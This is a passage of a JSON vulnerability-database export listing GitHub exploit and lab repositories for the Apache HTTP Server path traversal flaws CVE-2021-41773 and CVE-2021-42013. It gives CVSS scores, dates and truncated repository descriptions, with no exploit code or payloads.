"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-03-14T04:20:42", "id": "495E99E5-C1B0-52C1-9218-384D04161BE4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:14:33", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:12:43", "description": "# CVE-2021-42013\n## Introduction\nIt was found that the fix for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-14T18:00:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:22:13", "id": "F41EE867-4E63-5259-9DF0-745881884D04", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:15:08", "description": "# CVE-2021-41773\n- [CVE-2021-41773: Path Traversal Zero-Day in A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T11:55:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:27:30", "id": "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nA Zeek package which raises notices for Path T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T06:54:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T05:48:41", "id": "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-20T13:22:33", "description": "# Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Ch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T02:12:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-02-20T09:15:02", "id": "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:11:27", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T09:07:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:38:27", "id": "68A13FF0-60E5-5A29-9248-83A940B0FB02", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-Playground\nSome docker images to play with CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-04T22:52:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-11T09:06:38", "id": "86360765-0B1A-5D73-A805-BAE8F1B5D16D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-28T21:50:54", "description": "# SimplesApachePathTraversal\n\n\n\n<p align=\"center\">\n<a href=\"http...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T17:03:56", "type": "githubexploit", "title": "Exploit for Files or Directories Accessible to External Parties in Apache Flink", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773", "CVE-2020-17519"], "modified": "2022-02-28T17:25:24", "id": "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T12:39:42", "description": "# CVE-2021-42013-LAB\nApache HTTP Server 2.4.50 - RCE Lab\n\n\n**exp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T13:26:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-02-20T23:15:08", "id": "6A0A657E-8300-5312-99CE-E11F460B1DBF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:24:03", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:28:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:28:51", "id": "CC15AE65-B697-525A-AF4B-38B1501CAB49", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:31", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T12:15:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T12:15:18", "id": "9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-28T15:50:38", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "E81474F6-6DDC-5FC2-828A-812A8815E3B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:57", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:35:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:35:00", "id": "E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T04:56:17", "description": "# CVE-2021-42013\nC implementation of the infamous [Apache 2.4.50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-31T03:28:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-05-31T03:29:22", "id": "61075B23-F713-537A-9B84-7EB9B96CF228", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-01T23:13:35", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "4051D2EF-1C43-576D-ADB2-B519B31F93A0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-27T09:32:53", "description": "# CVE-2021-42013_Reverse-Shell\nPoC CVE-2021-42013 reverse shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T12:57:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-03-27T07:43:58", "id": "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:49:33", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T05:44:54", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-04T15:27:56", "id": "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-42013 - Apache HTTP Server 2.4.50\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T15:32:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-23T13:16:56", "id": "5312D04F-9490-5472-84FA-86B3BBDC8928", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-30T00:48:07", "description": "# CVE-2021-42013\n## Poc CVE-2021-42013 - Apache 2.4.50 withou...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-23T21:58:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-29T22:56:33", "id": "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T22:19:41", "description": "# apache-exploit-CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T18:31:29", "type": 